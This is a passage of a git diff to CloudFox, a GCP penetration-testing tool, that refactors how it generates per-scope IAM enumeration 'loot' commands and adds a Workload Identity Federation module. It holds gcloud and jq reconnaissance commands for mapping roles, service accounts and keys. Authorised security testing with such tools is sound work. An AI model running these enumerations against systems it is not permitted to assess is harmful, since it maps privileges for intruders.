IAM Enumeration Commands\n# Generated by CloudFox\n# Use these commands to enumerate roles and permissions for identities\n\n", - } + // Per-scope loot is initialized lazily in addToScopeLoot } func (m *IAMModule) generateLoot() { - // Track unique service accounts we've seen + // Track unique service accounts we've seen per scope sasSeen := make(map[string]bool) for _, sb := range m.ScopeBindings { if sb.MemberType != "ServiceAccount" { continue } - if sasSeen[sb.MemberEmail] { + + // Create a unique key combining SA email and scope + scopeKey := fmt.Sprintf("%s:%s:%s", sb.ScopeType, sb.ScopeID, sb.MemberEmail) + if sasSeen[scopeKey] { continue } - sasSeen[sb.MemberEmail] = true + sasSeen[scopeKey] = true // Check for high privilege roles isHighPriv := highPrivilegeRoles[sb.Role] + var lootContent string if isHighPriv { - m.LootMap["iam-commands"].Contents += fmt.Sprintf( + lootContent = fmt.Sprintf( "# Service Account: %s [HIGH PRIVILEGE] (%s)\n", sb.MemberEmail, sb.Role, ) } else { - m.LootMap["iam-commands"].Contents += fmt.Sprintf( + lootContent = fmt.Sprintf( "# Service Account: %s\n", sb.MemberEmail, ) @@ -265,7 +273,7 @@ func (m *IAMModule) generateLoot() { projectID = m.ProjectIDs[0] } - m.LootMap["iam-commands"].Contents += fmt.Sprintf( + lootContent += fmt.Sprintf( "gcloud iam service-accounts describe %s --project=%s\n"+ "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ @@ -277,54 +285,119 @@ func (m *IAMModule) generateLoot() { sb.MemberEmail, projectID, sb.MemberEmail, ) + + // Route loot to appropriate scope + m.addToScopeLoot(sb.ScopeType, sb.ScopeID, "iam-commands", lootContent) } - // Add service accounts with keys + // Add service accounts with keys (project-level) for _, sa := range m.ServiceAccounts { if sa.HasKeys { - m.LootMap["iam-commands"].Contents += fmt.Sprintf( + lootContent := fmt.Sprintf( "# Service Account with Keys: %s (Keys: %d)\n"+ "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n\n", sa.Email, sa.KeyCount, sa.Email, sa.ProjectID, ) + m.addToScopeLoot("project", sa.ProjectID, "iam-commands", lootContent) } } - // Add custom roles + // Add custom roles (project-level) for _, role := range m.CustomRoles { - m.LootMap["iam-commands"].Contents += fmt.Sprintf( + lootContent := fmt.Sprintf( "# Custom Role: %s (%d permissions)\n"+ "gcloud iam roles describe %s --project=%s\n\n", role.Title, role.PermissionCount, extractRoleName(role.Name), role.ProjectID, ) + m.addToScopeLoot("project", role.ProjectID, "iam-commands", lootContent) } // Generate IAM enumeration commands m.generateEnumerationLoot() } -func (m *IAMModule) generateEnumerationLoot() { - loot := m.LootMap["iam-enumeration"] +// addToScopeLoot adds loot content to the appropriate scope-level loot file +func (m *IAMModule) addToScopeLoot(scopeType, scopeID, lootName, content string) { + m.mu.Lock() + defer m.mu.Unlock() + + var lootMap map[string]*internal.LootFile + switch scopeType { + case "organization": + lootMap = m.OrgLoot + case "folder": + lootMap = m.FolderLoot + case "project": + lootMap = m.ProjectLoot + default: + return + } + key := scopeID + ":" + lootName + if lootMap[key] == nil { + lootMap[key] = &internal.LootFile{ + Name: lootName, + Contents: "# GCP IAM Commands\n# Generated by CloudFox\n\n", + } + } + lootMap[key].Contents += content +} + +func (m *IAMModule) generateEnumerationLoot() { // Add organization-level enumeration commands for _, orgID := range m.OrgIDs { orgName := m.OrgNames[orgID] - loot.Contents += fmt.Sprintf("# =====================================================\n") - loot.Contents += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) - loot.Contents += fmt.Sprintf("# =====================================================\n\n") + var lootContent string + lootContent += fmt.Sprintf("# =====================================================\n") + lootContent += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) + lootContent += fmt.Sprintf("# =====================================================\n\n") - loot.Contents += fmt.Sprintf("# List all IAM bindings for organization\n") - loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) + lootContent += fmt.Sprintf("# List all IAM bindings for organization\n") + lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) - loot.Contents += fmt.Sprintf("# List all roles assigned at organization level\n") - loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", orgID) + lootContent += fmt.Sprintf("# List all roles assigned at organization level\n") + lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", orgID) - loot.Contents += fmt.Sprintf("# List all members with their roles at organization level\n") - loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", orgID) + lootContent += fmt.Sprintf("# List all members with their roles at organization level\n") + lootContent += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", orgID) + + m.addToScopeLoot("organization", orgID, "iam-enumeration", lootContent) } - // Track unique identities for enumeration commands + // Add project-level enumeration commands + for _, projectID := range m.ProjectIDs { + projectName := m.GetProjectName(projectID) + var lootContent string + lootContent += fmt.Sprintf("# =====================================================\n") + lootContent += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) + lootContent += fmt.Sprintf("# =====================================================\n\n") + + lootContent += fmt.Sprintf("# List all IAM bindings for project\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json\n\n", projectID) + + lootContent += fmt.Sprintf("# List all roles assigned at project level\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", projectID) + + lootContent += fmt.Sprintf("# List all members with their roles at project level\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", projectID) + + lootContent += fmt.Sprintf("# Find all roles for a specific user (replace USER_EMAIL)\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"USER_EMAIL\")) | .role'\n\n", projectID) + + lootContent += fmt.Sprintf("# Find all roles for a specific service account (replace SA_EMAIL)\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"SA_EMAIL\")) | .role'\n\n", projectID) + + lootContent += fmt.Sprintf("# List all service accounts in project\n") + lootContent += fmt.Sprintf("gcloud iam service-accounts list --project=%s --format=json\n\n", projectID) + + lootContent += fmt.Sprintf("# List all custom roles in project\n") + lootContent += fmt.Sprintf("gcloud iam roles list --project=%s --format=json\n\n", projectID) + + m.addToScopeLoot("project", projectID, "iam-enumeration", lootContent) + } + + // Track unique identities for enumeration commands - add to project level identitiesSeen := make(map[string]bool) type identityInfo struct { email string @@ -364,74 +437,30 @@ func (m *IAMModule) generateEnumerationLoot() { } } - // Add project-level enumeration commands + // Add identity-specific enumeration commands per project for _, projectID := range m.ProjectIDs { - projectName := m.GetProjectName(projectID) - loot.Contents += fmt.Sprintf("# =====================================================\n") - loot.Contents += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) - loot.Contents += fmt.Sprintf("# =====================================================\n\n") - - loot.Contents += fmt.Sprintf("# List all IAM bindings for project\n") - loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json\n\n", projectID) - - loot.Contents += fmt.Sprintf("# List all roles assigned at project level\n") - loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", projectID) - - loot.Contents += fmt.Sprintf("# List all members with their roles at project level\n") - loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", projectID) - - loot.Contents += fmt.Sprintf("# Find all roles for a specific user (replace USER_EMAIL)\n") - loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"USER_EMAIL\")) | .role'\n\n", projectID) - - loot.Contents += fmt.Sprintf("# Find all roles for a specific service account (replace SA_EMAIL)\n") - loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"SA_EMAIL\")) | .role'\n\n", projectID) - - loot.Contents += fmt.Sprintf("# List all service accounts in project\n") - loot.Contents += fmt.Sprintf("gcloud iam service-accounts list --project=%s --format=json\n\n", projectID) - - loot.Contents += fmt.Sprintf("# List all custom roles in project\n") - loot.Contents += fmt.Sprintf("gcloud iam roles list --project=%s --format=json\n\n", projectID) - } - - // Add identity-specific enumeration commands - loot.Contents += fmt.Sprintf("# =====================================================\n") - loot.Contents += fmt.Sprintf("# Identity-Specific Enumeration Commands\n") - loot.Contents += fmt.Sprintf("# =====================================================\n\n") - - for email, info := range identities { - if info.memberType == "ServiceAccount" { - loot.Contents += fmt.Sprintf("# Service Account: %s\n", email) - // Extract project from SA email - saProject := "" - parts := strings.Split(email, "@") - if len(parts) == 2 { - saParts := strings.Split(parts[1], ".") - if len(saParts) >= 1 { - saProject = saParts[0] - } - } - if saProject != "" { - loot.Contents += fmt.Sprintf("# Find all roles for this service account across all projects\n") - for _, projectID := range m.ProjectIDs { - loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n", projectID, email) - } - loot.Contents += "\n" + var lootContent string + lootContent += fmt.Sprintf("# =====================================================\n") + lootContent += fmt.Sprintf("# Identity-Specific Enumeration Commands\n") + lootContent += fmt.Sprintf("# =====================================================\n\n") + + for email, info := range identities { + if info.memberType == "ServiceAccount" { + lootContent += fmt.Sprintf("# Service Account: %s\n", email) + lootContent += fmt.Sprintf("# Find all roles for this service account\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n\n", projectID, email) + } else if info.memberType == "User" { + lootContent += fmt.Sprintf("# User: %s\n", email) + lootContent += fmt.Sprintf("# Find all roles for this user\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n\n", projectID, email) + } else if info.memberType == "Group" { + lootContent += fmt.Sprintf("# Group: %s\n", email) + lootContent += fmt.Sprintf("# Find all roles for this group\n") + lootContent += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n\n", projectID, email) } - } else if info.memberType == "User" { - loot.Contents += fmt.Sprintf("# User: %s\n", email) - loot.Contents += fmt.Sprintf("# Find all roles for this user across all projects\n") - for _, projectID := range m.ProjectIDs { - loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n", projectID, email) - } - loot.Contents += "\n" - } else if info.memberType == "Group" { - loot.Contents += fmt.Sprintf("# Group: %s\n", email) - loot.Contents += fmt.Sprintf("# Find all roles for this group across all projects\n") - for _, projectID := range m.ProjectIDs { - loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n", projectID, email) - } - loot.Contents += "\n" } + + m.addToScopeLoot("project", projectID, "iam-enumeration", lootContent) } } @@ -621,7 +650,7 @@ func (m *IAMModule) buildTables() []internal.TableFile { "Entry Type", "Identity", "Role", - "High Privilege", + "Admin", "Custom Role", "Has Keys", "Condition", @@ -635,9 +664,11 @@ func (m *IAMModule) buildTables() []internal.TableFile { // Add scope bindings (one row per binding) for _, sb := range m.ScopeBindings { - isHighPriv := "No" - if highPrivilegeRoles[sb.Role] { - isHighPriv = "Yes" + // Check admin status from FoxMapper only - shows Org/Folder/Project or No + // This is different from "high privilege roles" - Admin means broad IAM control + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sb.MemberEmail) + if adminStatus == "" { + adminStatus = "No" } isCustom := "No" @@ -689,7 +720,7 @@ func (m *IAMModule) buildTables() []internal.TableFile { sb.MemberType, sb.MemberEmail, sb.Role, - isHighPriv, + adminStatus, isCustom, "-", condition, @@ -718,6 +749,12 @@ func (m *IAMModule) buildTables() []internal.TableFile { groups = strings.Join(memberGroups, ", ") } + // Check admin status from FoxMapper + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sa.Email) + if adminStatus == "" { + adminStatus = "No" + } + // Check attack paths for this service account attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) @@ -728,7 +765,7 @@ func (m *IAMModule) buildTables() []internal.TableFile { "ServiceAccountInfo", sa.Email + disabled, sa.DisplayName, - "-", + adminStatus, "-", hasKeys, "-", @@ -776,9 +813,53 @@ func (m *IAMModule) buildTables() []internal.TableFile { return tables } -func (m *IAMModule) collectLootFiles() []internal.LootFile { +// collectAllLootFiles collects all loot files from all scopes for org-level output. +// This merges loot by name (iam-commands, iam-enumeration) across all scopes. +func (m *IAMModule) collectAllLootFiles() []internal.LootFile { + // Merge loot by name across all scopes + mergedLoot := make(map[string]*internal.LootFile) + + // Helper to add loot content + addLoot := func(lootMap map[string]*internal.LootFile) { + for key, loot := range lootMap { + // Key format is "scopeID:lootName" + parts := strings.SplitN(key, ":", 2) + if len(parts) != 2 { + continue + } + lootName := parts[1] + + if mergedLoot[lootName] == nil { + mergedLoot[lootName] = &internal.LootFile{ + Name: lootName, + Contents: "", + } + } + // Avoid duplicate headers + content := loot.Contents + if strings.HasPrefix(content, "# GCP IAM") { + // Skip header if already present + if mergedLoot[lootName].Contents == "" { + // First entry, keep header + } else { + // Strip header from subsequent entries + lines := strings.SplitN(content, "\n\n", 2) + if len(lines) > 1 { + content = lines[1] + } + } + } + mergedLoot[lootName].Contents += content + } + } + + // Add in order: org, folder, project + addLoot(m.OrgLoot) + addLoot(m.FolderLoot) + addLoot(m.ProjectLoot) + var lootFiles []internal.LootFile - for _, loot := range m.LootMap { + for _, loot := range mergedLoot { if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { lootFiles = append(lootFiles, *loot) } @@ -786,12 +867,86 @@ func (m *IAMModule) collectLootFiles() []internal.LootFile { return lootFiles } -func (m *IAMModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { - outputData := internal.HierarchicalOutputData{ - OrgLevelData: make(map[string]internal.CloudfoxOutput), - ProjectLevelData: make(map[string]internal.CloudfoxOutput), +// collectLootFilesForProject returns loot files for a specific project with inheritance. +// This includes org-level loot + ancestor folder loot + project-level loot. +func (m *IAMModule) collectLootFilesForProject(projectID string) []internal.LootFile { + // Get ancestry for this project + var projectOrgID string + var ancestorFolders []string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) } + // Merge loot by name + mergedLoot := make(map[string]*internal.LootFile) + + // Helper to add loot content + addLoot := func(key string, loot *internal.LootFile) { + parts := strings.SplitN(key, ":", 2) + if len(parts) != 2 { + return + } + lootName := parts[1] + + if mergedLoot[lootName] == nil { + mergedLoot[lootName] = &internal.LootFile{ + Name: lootName, + Contents: "", + } + } + // Avoid duplicate headers + content := loot.Contents + if strings.HasPrefix(content, "# GCP IAM") { + if mergedLoot[lootName].Contents == "" { + // First entry, keep header + } else { + // Strip header from subsequent entries + lines := strings.SplitN(content, "\n\n", 2) + if len(lines) > 1 { + content = lines[1] + } + } + } + mergedLoot[lootName].Contents += content + } + + // Add org-level loot + if projectOrgID != "" { + for key, loot := range m.OrgLoot { + if strings.HasPrefix(key, projectOrgID+":") { + addLoot(key, loot) + } + } + } + + // Add ancestor folder loot (in order from top to bottom) + for i := len(ancestorFolders) - 1; i >= 0; i-- { + folderID := ancestorFolders[i] + for key, loot := range m.FolderLoot { + if strings.HasPrefix(key, folderID+":") { + addLoot(key, loot) + } + } + } + + // Add project-level loot + for key, loot := range m.ProjectLoot { + if strings.HasPrefix(key, projectID+":") { + addLoot(key, loot) + } + } + + var lootFiles []internal.LootFile + for _, loot := range mergedLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *IAMModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { // Determine org ID - prefer discovered orgs, fall back to hierarchy orgID := "" if len(m.OrgIDs) > 0 { @@ -800,23 +955,40 @@ func (m *IAMModule) writeHierarchicalOutput(ctx context.Context, logger internal orgID = m.Hierarchy.Organizations[0].ID } + lootFiles := m.collectAllLootFiles() + tables := m.buildTables() + + // Check if we should use single-pass tee streaming for large datasets + totalRows := 0 + for _, t := range tables { + totalRows += len(t.Body) + } + + if orgID != "" && totalRows >= 50000 { + m.writeHierarchicalOutputTee(ctx, logger, orgID, tables, lootFiles) + return + } + + // Standard output path for smaller datasets + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + if orgID != "" { // DUAL OUTPUT: Complete aggregated output at org level - tables := m.buildTables() - lootFiles := m.collectLootFiles() outputData.OrgLevelData[orgID] = IAMOutput{Table: tables, Loot: lootFiles} - // DUAL OUTPUT: Filtered per-project output + // DUAL OUTPUT: Filtered per-project output (with inherited loot) for _, projectID := range m.ProjectIDs { projectTables := m.buildTablesForProject(projectID) + projectLoot := m.collectLootFilesForProject(projectID) if len(projectTables) > 0 && len(projectTables[0].Body) > 0 { - outputData.ProjectLevelData[projectID] = IAMOutput{Table: projectTables, Loot: nil} + outputData.ProjectLevelData[projectID] = IAMOutput{Table: projectTables, Loot: projectLoot} } } } else if len(m.ProjectIDs) > 0 { // FALLBACK: No org discovered, output complete data to first project - tables := m.buildTables() - lootFiles := m.collectLootFiles() outputData.ProjectLevelData[m.ProjectIDs[0]] = IAMOutput{Table: tables, Loot: lootFiles} } @@ -829,6 +1001,83 @@ func (m *IAMModule) writeHierarchicalOutput(ctx context.Context, logger internal } } +// writeHierarchicalOutputTee uses single-pass streaming for large datasets. +func (m *IAMModule) writeHierarchicalOutputTee(ctx context.Context, logger internal.Logger, orgID string, tables []internal.TableFile, lootFiles []internal.LootFile) { + totalRows := 0 + for _, t := range tables { + totalRows += len(t.Body) + } + logger.InfoM(fmt.Sprintf("Using single-pass tee streaming for %d rows", totalRows), globals.GCP_IAM_MODULE_NAME) + + pathBuilder := m.BuildPathBuilder() + + // Build reverse lookup: for each folder, which projects are under it + folderToProjects := make(map[string][]string) + orgToProjects := make(map[string][]string) + + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + for _, projectID := range m.ProjectIDs { + // Get the org this project belongs to + projectOrgID := m.OrgCache.GetProjectOrgID(projectID) + if projectOrgID != "" { + orgToProjects[projectOrgID] = append(orgToProjects[projectOrgID], projectID) + } + + // Get all ancestor folders for this project + ancestorFolders := m.OrgCache.GetProjectAncestorFolders(projectID) + for _, folderID := range ancestorFolders { + folderToProjects[folderID] = append(folderToProjects[folderID], projectID) + } + } + } + + // Create a row router that routes based on scope type and OrgCache + rowRouter := func(row []string) []string { + // Row format: [ScopeType, ScopeID, ScopeName, ...] + scopeType := row[0] + scopeID := row[1] + + switch scopeType { + case "project": + // Direct project binding - route to that project only + return []string{scopeID} + case "organization": + // Org binding - route to all projects under this org + if projects, ok := orgToProjects[scopeID]; ok { + return projects + } + return m.ProjectIDs + case "folder": + // Folder binding - route to all projects under this folder + if projects, ok := folderToProjects[scopeID]; ok { + return projects + } + return m.ProjectIDs + default: + return nil + } + } + + config := internal.TeeStreamingConfig{ + OrgID: orgID, + ProjectIDs: m.ProjectIDs, + Tables: tables, + LootFiles: lootFiles, + ProjectLootCollector: m.collectLootFilesForProject, + RowRouter: rowRouter, + PathBuilder: pathBuilder, + Format: m.Format, + Verbosity: m.Verbosity, + Wrap: m.WrapTable, + } + + err := internal.HandleHierarchicalOutputTee(config) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing tee streaming output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} + // buildTablesForProject builds tables filtered to only include data for a specific project func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile { header := []string{ @@ -838,7 +1087,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile "Member Type", "Member", "Role", - "High Privilege", + "Admin", "Custom Role", "Has Keys", "Condition", @@ -850,15 +1099,43 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile var body [][]string - // Add scope bindings for this project only + // Get ancestry data for this project to include org and folder bindings + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + + // Build a set of ancestor folder IDs for quick lookup + ancestorFolderSet := make(map[string]bool) + for _, folderID := range ancestorFolders { + ancestorFolderSet[folderID] = true + } + + // Add scope bindings - include project, org, and ancestor folder bindings for _, sb := range m.ScopeBindings { - if sb.ScopeType != "project" || sb.ScopeID != projectID { + // Check if this binding applies to this project + include := false + switch sb.ScopeType { + case "project": + include = sb.ScopeID == projectID + case "organization": + // Include org bindings if this is the project's org + include = projectOrgID != "" && sb.ScopeID == projectOrgID + case "folder": + // Include folder bindings if folder is in project's ancestry + include = ancestorFolderSet[sb.ScopeID] + } + + if !include { continue } - isHighPriv := "No" - if highPrivilegeRoles[sb.Role] { - isHighPriv = "Yes" + // Check admin status from FoxMapper only - shows Org/Folder/Project or No + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sb.MemberEmail) + if adminStatus == "" { + adminStatus = "No" } isCustom := "No" @@ -906,7 +1183,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile sb.MemberType, sb.MemberEmail, sb.Role, - isHighPriv, + adminStatus, isCustom, "-", condition, @@ -938,6 +1215,12 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile groups = strings.Join(memberGroups, ", ") } + // Check admin status from FoxMapper + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sa.Email) + if adminStatus == "" { + adminStatus = "No" + } + // Check attack paths for this service account attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) @@ -948,7 +1231,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile "ServiceAccountInfo", sa.Email + disabled, sa.DisplayName, - "-", + adminStatus, "-", hasKeys, "-", @@ -1003,7 +1286,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile func (m *IAMModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { tables := m.buildTables() - lootFiles := m.collectLootFiles() + lootFiles := m.collectAllLootFiles() // Count security findings for logging publicAccessFound := false diff --git a/gcp/commands/identityfederation.go b/gcp/commands/identityfederation.go new file mode 100644 index 00000000..0d520cef --- /dev/null +++ b/gcp/commands/identityfederation.go @@ -0,0 +1,618 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + workloadidentityservice "github.com/BishopFox/cloudfox/gcp/services/workloadIdentityService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPIdentityFederationCommand = &cobra.Command{ + Use: globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + Aliases: []string{"federation", "wif", "federated-identity"}, + Short: "Enumerate Workload Identity Federation (external identities)", + Long: `Enumerate Workload Identity Federation pools, providers, and federated bindings. + +Workload Identity Federation allows external identities (AWS, GitHub Actions, +GitLab CI, Azure AD, etc.) to authenticate as GCP service accounts without +using service account keys. + +Features: +- Lists Workload Identity Pools and Providers +- Analyzes AWS, OIDC (GitHub Actions, GitLab CI), and SAML providers +- Identifies risky provider configurations (missing attribute conditions) +- Shows federated identity bindings to GCP service accounts +- Generates exploitation commands for pentesting + +Security Considerations: +- Providers without attribute conditions allow ANY identity from the source +- OIDC providers (GitHub Actions, GitLab) may allow any repo/pipeline to authenticate +- AWS providers allow cross-account access from the configured AWS account +- Federated identities inherit all permissions of the bound GCP service account + +TIP: Run 'workload-identity' to enumerate GKE-specific K8s SA -> GCP SA bindings. +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, + Run: runGCPIdentityFederationCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type IdentityFederationModule struct { + gcpinternal.BaseGCPModule + + ProjectPools map[string][]workloadidentityservice.WorkloadIdentityPool // projectID -> pools + ProjectProviders map[string][]workloadidentityservice.WorkloadIdentityProvider // projectID -> providers + ProjectFederatedBindings map[string][]workloadidentityservice.FederatedIdentityBinding // projectID -> federated bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type IdentityFederationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IdentityFederationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IdentityFederationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPIdentityFederationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + if err != nil { + return + } + + module := &IdentityFederationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPools: make(map[string][]workloadidentityservice.WorkloadIdentityPool), + ProjectProviders: make(map[string][]workloadidentityservice.WorkloadIdentityProvider), + ProjectFederatedBindings: make(map[string][]workloadidentityservice.FederatedIdentityBinding), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *IdentityFederationModule) Execute(ctx context.Context, logger internal.Logger) { + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper cache for attack path analysis", globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, m.processProject) + + allPools := m.getAllPools() + allProviders := m.getAllProviders() + allFederatedBindings := m.getAllFederatedBindings() + + if len(allPools) == 0 { + logger.InfoM("No Workload Identity Federation configurations found", globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d pool(s), %d provider(s), %d federated binding(s)", + len(allPools), len(allProviders), len(allFederatedBindings)), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllPools returns all pools from all projects +func (m *IdentityFederationModule) getAllPools() []workloadidentityservice.WorkloadIdentityPool { + var all []workloadidentityservice.WorkloadIdentityPool + for _, pools := range m.ProjectPools { + all = append(all, pools...) + } + return all +} + +// getAllProviders returns all providers from all projects +func (m *IdentityFederationModule) getAllProviders() []workloadidentityservice.WorkloadIdentityProvider { + var all []workloadidentityservice.WorkloadIdentityProvider + for _, providers := range m.ProjectProviders { + all = append(all, providers...) + } + return all +} + +// getAllFederatedBindings returns all federated bindings from all projects +func (m *IdentityFederationModule) getAllFederatedBindings() []workloadidentityservice.FederatedIdentityBinding { + var all []workloadidentityservice.FederatedIdentityBinding + for _, bindings := range m.ProjectFederatedBindings { + all = append(all, bindings...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *IdentityFederationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Identity Federation in project: %s", projectID), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + } + + wiSvc := workloadidentityservice.New() + + // Get Workload Identity Pools + allPools, err := wiSvc.ListWorkloadIdentityPools(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + fmt.Sprintf("Could not list Workload Identity Pools in project %s", projectID)) + return + } + + // Filter out GKE Workload Identity pools (*.svc.id.goog) - those belong to the workload-identity module + var pools []workloadidentityservice.WorkloadIdentityPool + for _, pool := range allPools { + if !strings.HasSuffix(pool.PoolID, ".svc.id.goog") { + pools = append(pools, pool) + } + } + + var providers []workloadidentityservice.WorkloadIdentityProvider + + // Get providers for each pool + for _, pool := range pools { + poolProviders, err := wiSvc.ListWorkloadIdentityProviders(projectID, pool.PoolID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + fmt.Sprintf("Could not list providers for pool %s", pool.PoolID)) + continue + } + providers = append(providers, poolProviders...) + } + + // Find federated identity bindings + fedBindings, err := wiSvc.FindFederatedIdentityBindings(projectID, pools) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + fmt.Sprintf("Could not find federated identity bindings in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectPools[projectID] = pools + m.ProjectProviders[projectID] = providers + m.ProjectFederatedBindings[projectID] = fedBindings + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["identity-federation-commands"] = &internal.LootFile{ 